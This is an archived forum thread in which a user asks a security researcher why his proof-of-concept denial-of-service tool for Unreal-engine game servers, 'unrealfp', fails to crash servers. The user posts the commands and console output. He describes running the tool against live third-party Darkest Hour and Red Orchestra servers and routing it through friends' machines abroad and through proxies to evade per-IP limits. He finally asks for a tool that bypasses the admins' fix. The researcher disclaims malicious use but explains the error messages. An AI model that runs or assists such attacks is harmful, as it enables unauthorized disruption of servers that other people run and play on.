Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 17:02

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 9 posts ] 
Author Message
 Post subject: [Question]Unrealfp tool doesn't work with me!
PostPosted: 22 Jul 2010 03:00 

Joined: 22 Jul 2010 02:15
Posts: 6
Hello aluigi, hope you're doing good, and thx buddy for this site and your work in total.

I have downloaded your tool: UNREALFP, and I started to use it for testing various stuff, and one of these things I been testing is the command:
unrealfp -c steamclientblob SERVER PORT
but actually nothing is happening, and server doesn't crash..! how come? or is there something wrong I'm doing?

I also Tried [-c] and [-C] and same results, and nothing's happening.

sometimes the console gives me this reply and keeps going on unless I hit: Ctrl+c to cancel it:
Quote:
- target xxx.xxx.xxx.xxx : xxxx (I hide the server IP and the port)

- send info queries
....
- handle reply:

- start attack:

Player: ..
- no compatibility fixes
Player: ..
Player: ....
Player: ....
Player: ....
Player: .. players_per_IP limit or timed out
Player: .. players_per_IP limit or timed out
Player: .. players_per_IP limit or timed out
Player: .^C

as u can see, I finally hit Ctrl+c to cancel the process.

after I canceled I tried it again for a second time without much time delay, and I got this result, but again Server doesn't Crash:
Quote:
- target xxx.xxx.xxx.xxx : xxxx (I hide the server IP and the port)

- send info queries
...
- start attack:

Player: ..
Error: socket timeout, no reply received
X:\>

what is this Error? does it mean that the server now has got a fix? because when I try to go to the server I find out that it's already working and no effect of the tool has done anything to it..!

and as u can see in the first Quote, it says: no compatibility fixes so again whats the meaning of this?

now I tried a detailed command in order to help you help me understand what's going on, so I did this:
Quote:
X:\>unrealfp -C steamclientblob xxx.xxx.xxx.xxx xxxx (again I hide the Numbers)

- target xxx.xxx.xxx.xxx : xxxx

- send info queries
....
- handle reply:

- start attack:

Player: ..
- no compatibility fixes
Player: .. players_per_IP limit or timed out
Player: .. players_per_IP limit or timed out
Player: .. players_per_IP limit or timed out
Player: .. players_per_IP limit or timed out
Player: .. players_per_IP limit or timed out ^C
X:\>

and it keeps going until or unless I again hit Ctrl+c to cancel it..! this time I used the Option [C] not [c].

so I tried again another Option which is -v in order to show all the commands received from the server, and here's what I got:
Quote:
X:\>unrealfp -v xxx.xxx.xxx.xxx xxxx (again I hide the Numbers)

................................................. DoS 0.2.2

- target xxx.xxx.xxx.xxx : xxxx

- send info queries
....
- handle reply:

- start attack:

Player: ..
- no compatibility fixes
Player: ..
UPGRADE MINVER=3180 VER=3339
Player: ..
STEAMENCRYPTIONKEY STEAMID=xxxxxxxxxxxxxxxxxxxx SECURE=1.. (I hide the SteamID)
Player: ..
STEAMENCRYPTIONKEY STEAMID=xxxxxxxxxxxxxxxxxxxx SECURE=1..
Player: ..
STEAMENCRYPTIONKEY STEAMID=xxxxxxxxxxxxxxxxxxxx SECURE=1..
Player: ..
STEAMENCRYPTIONKEY STEAMID=xxxxxxxxxxxxxxxxxxxx SECURE=1..
Player: ..
STEAMENCRYPTIONKEY STEAMID=xxxxxxxxxxxxxxxxxxxx SECURE=1..
Player: ..
STEAMENCRYPTIONKEY STEAMID=xxxxxxxxxxxxxxxxxxxx SECURE=1..
Player: .^C
X:\>

I hit Ctrl+c to Cancel..! and server still running.

so to cut it short let me say that I played around with almost every Option in this tool [Unrealfp] and the server doesn't crash.

I'm using it on a Supported game based on the UT2004 Engine that this tool support which I believe it's version is 0.2.2.

thx in advance and hope you could help.


Top
 Profile  
 
 
 Post subject: Re: [Question]Unrealfp tool doesn't work with me!
PostPosted: 22 Jul 2010 09:36 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Quote:
steamclientblob

first I have never written "steamclientblob" in my advisories, if I write "STEAMCLIENTBLOB" instead of "steamclientblob" there is a reason

secondly in my advisories are reported all the exact softwares and versions vulnerables, so "a Supported game based on the UT2004 Engine" means exactly nothing because it's not referred to the advisory

third, I don't support malicious exploiting of my proof-of-concepts


Top
 Profile  
 
 Post subject: Re: [Question]Unrealfp tool doesn't work with me!
PostPosted: 22 Jul 2010 18:24 

Joined: 22 Jul 2010 02:15
Posts: 6
Hello,

Quote:
first I have never written "steamclientblob" in my advisories, if I write "STEAMCLIENTBLOB" instead of "steamclientblob" there is a reason

you're right, you wrote it in Capital Letters in your advisory, and so I went back to try it in that shape but unfortunately it was the same! I mean either it was small or Capital "STEAMCLIENTBLOB" or "steamclientblob" it doesn't work any more.

Quote:
secondly in my advisories are reported all the exact softwares and versions vulnerables, so "a Supported game based on the UT2004 Engine" means exactly nothing because it's not referred to the advisory

the game I'm talking about is actually a MOD Called: Darkest Hour - http://www.darkesthourgame.com and it's a MOD for Red Orchestra Game made by: Tripwire Interactive games.

you released this tool on: 05 Jul 2010. and on the Fix part of your advisory you mentioned that there is no FIX yet for it, but it seems it's been Fixed, so I was wondering what was the Fix, that's another thing.

and please, what is the meaning of these Messages you see beneath the word: PLAYER? like:

1- "- no compatibility fixes"
2- "Player: .. players_per_IP limit or timed out"
3- "Error: socket timeout, no reply received"

and one last thing:

I asked from a friend to make a server on his PC and told him that I'll try something on it, so he did it, and I tried the tool on his server, and it crashed, but I noticed something different in the Messages because I got a new Message and it was:
Quote:
X:\>unrealfp -c STEAMCLIENTBLOB xxx.xxx.xxx.xxx xxxx (again I hide the Numbers)

- target xxx.xxx.xxx.xxx : xxxx

- send info queries
....
- handle reply:

- start attack:

Player: ...
Error: Connection reset by peer

X:\>

this time it said: Error: Connection reset by peer and his server Crashed..!

so what's the difference between this last message and the other ones above?

P.S: I also tried this last server with "STEAMCLIENTBLOB" and "steamclientblob" and I got the same results, it seems it's the same even though I believe you when you say that there is a reason, but it's not clear to me.

Few Moments Later P.S.: I downloaded the version 0.2.4 of the same tool "http://aluigi.org/adv/ut3steamer-adv.txt" I read the advisory and tried various commands as well in the new version specially the "-B" with it's options specially option #6 and actually still not working, and I always get this Message: "Error: socket timeout, no reply received"

thats all, and thx.


Top
 Profile  
 
 Post subject: Re: [Question]Unrealfp tool doesn't work with me!
PostPosted: 22 Jul 2010 21:04 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
ok these are the info I neeed, good.

like all the games developed by Tripwire Interactive also Darkest Hour is affected by the same vulnerability I described in my advisory, and indeed the crash of your friend's server confirms it.

I have just checked the DH website and forum and there are no traces of patches/fixes in July so that means the bug is still there (they don't track the updates on Steam so it's impossible to know about any fix).

now the meaning of the messages returned by unrealfp:

1- "- no compatibility fixes"
some games and versions of the Unreal engines have various differences in the protocol so this message means that the tested server uses the original protocol without these modifications (yeah I have choosed a not so good name)

2- "Player: .. players_per_IP limit or timed out"
it means that you are filling the server and that it no longer accepts other fake players from your IP address.
it's perfectly normal because it's a limitation added by Epic Games years ago to avoid that one single user takes the whole server filled and busy (aka "fake players bug")

3- "Error: socket timeout, no reply received"
it means that the server is not replying to the packets sent by the tool and the reasons can be:
- server crashed
- the previous players_per_IP limit, it happens if you have terminated and relaunched unrealfp and so it can't know that there is the limitation in progress because it simply doesn't receive answers from the server during that time

now, the explanation of what is happening with the server you tested.
practically when you launch unrealfp -s STEAMCLIENTBLOB it sends the command but seems that the server ignores it and so the tool continue with its default job: filling the slots of the server with unexistent players
that's why you arrive to the players_per_IP message

other than a possible custom work-around or fix of the server the only explanation of the ignored command is that the server is probably a cracked server and so it doesn't handled the Steam certificates allowing any user to join it.

as additional and useless test you can try replacing STEAMCLIENTBLOB with STEAMTICKET to see if there will be effects but I doubt, it's only a "curiosity test".


Top
 Profile  
 
 Post subject: Re: [Question]Unrealfp tool doesn't work with me!
PostPosted: 22 Jul 2010 21:52 

Joined: 22 Jul 2010 02:15
Posts: 6
I tried you last suggestion and I typed this Command:

Quote:
X:\>unrealfp -C STEAMTICKET xxx.xxx.xxx.xxx xxxx (again I hide the Numbers) (and I also tried with steamclientblob capital and small)

- target xxx.xxx.xxx.xxx : xxxx

- send info queries
....
- handle reply:

- start attack:

Player: ..
- no compatibility fixes
Player: ..
Player: ....
- activate the Frontline Fuel of War challenge fix
Player: ....
- activate the hexadecimal challenge fix
Player: ....
- activate the Frontline Fuel of War challenge fix
Player: .....
Error: seems that this game requires a specific challenge-response algorithm

X:\>

now this is a NEW Error Message, what does it mean?

P.S.: I tired this on a Darkest Hour Server, and a Red Orchestra Server (they are all Legit not Cracked) and I got the same Error Message, and when I repeat it with Small letter [-c] I get the: (Error: socket timeout, no reply received) and servers either the DH or RO doesn't crash.

Quote:
other than a possible custom work-around or fix of the server the only explanation of the ignored command is that the server is probably a cracked server and so it doesn't handled the Steam certificates allowing any user to join it


Actually they are Legit and Not Cracked Servers, they are Also VAC Proof Servers by Steam.

Quote:
2- "Player: .. players_per_IP limit or timed out"
it means that you are filling the server and that it no longer accepts other fake players from your IP address.
it's perfectly normal because it's a limitation added by Epic Games years ago to avoid that one single user takes the whole server filled and busy (aka "fake players bug")


thx for bringing this up, as I actually tried some work around this as I thought it might be the cause, so here is what I did:

- I tried using Team Viewer as a VNC Client and logged into one of my friends (in Other Country than mine) and he also owns Steam with the same games (mostly) and launched the tool from his PC, and I got the same results and servers doesn't crash.

- I also used a call bouncing service to do the same thing, and I got the same results.

- I tried a VNC Proxy Software (Decent one that allows even playing games vie it) and I got the same results, servers of Darkest Hour (the MOD) and EVEN Red Orchestra itself doesn't Crash.

- I also tried Team Viewer as a VNC Client from a different Friend than the first one and from a 2nd different country, and also got the same Results, server doesn't crash, or even add any fake players at all.

so what do you think is going on?

I'll PM you the IP of the DH Server, and the IP of the RO Server I tested on, so you can check for yourself if you want to, as I believe you might find whats causing this Failure.

thx for your time mate.


Top
 Profile  
 
 Post subject: Re: [Question]Unrealfp tool doesn't work with me!
PostPosted: 22 Jul 2010 21:57 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
in this case I don't have idea, I should know the game better to have other hypothesis but at this point I guess it could really be a new fix or something else.


Top
 Profile  
 
 Post subject: Re: [Question]Unrealfp tool doesn't work with me!
PostPosted: 27 Jul 2010 23:58 

Joined: 22 Jul 2010 02:15
Posts: 6
today I heard from a friend that it's a fix made by some server admin in England, and another one in USA.

no more fake players bug :(

when I asked him about this Fix, he says that the admins doesn't talk technically about it in any where, just happened that they talked about it via the Game chat itself to some players and he was one of them, I tried to log into the game to ask from the admins or one of them a copy of the fix or the: HOW-TO fix it, but I got no reply back.

that's all I have for now about it.


Top
 Profile  
 
 Post subject: Re: [Question]Unrealfp tool doesn't work with me!
PostPosted: 28 Jul 2010 08:43 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
exactly as I imagined, although I didn't think the bug was enough known that someone wanted to fix it.
this is very good.

anyway fixing it is a joke because the problem is very simple (if(string[0]) ...), probably they choosed the mod/mutator way


Top
 Profile  
 
 Post subject: Re: [Question]Unrealfp tool doesn't work with me!
PostPosted: 30 Jul 2010 07:14 

Joined: 22 Jul 2010 02:15
Posts: 6
:( but what is this Fix luigi? I don't get it!

and can you make another tool to by-pass this Fix? ;) that would be great.

P.S: one of the Admins mentioned: BlockDOS.net/com so if it's just a protection against the DOS from that site then this is not a proper fix, am I right?

or maybe this is another step beside the "FIX" to protect the servers against the "F.P.B" and the DOS!


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 9 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: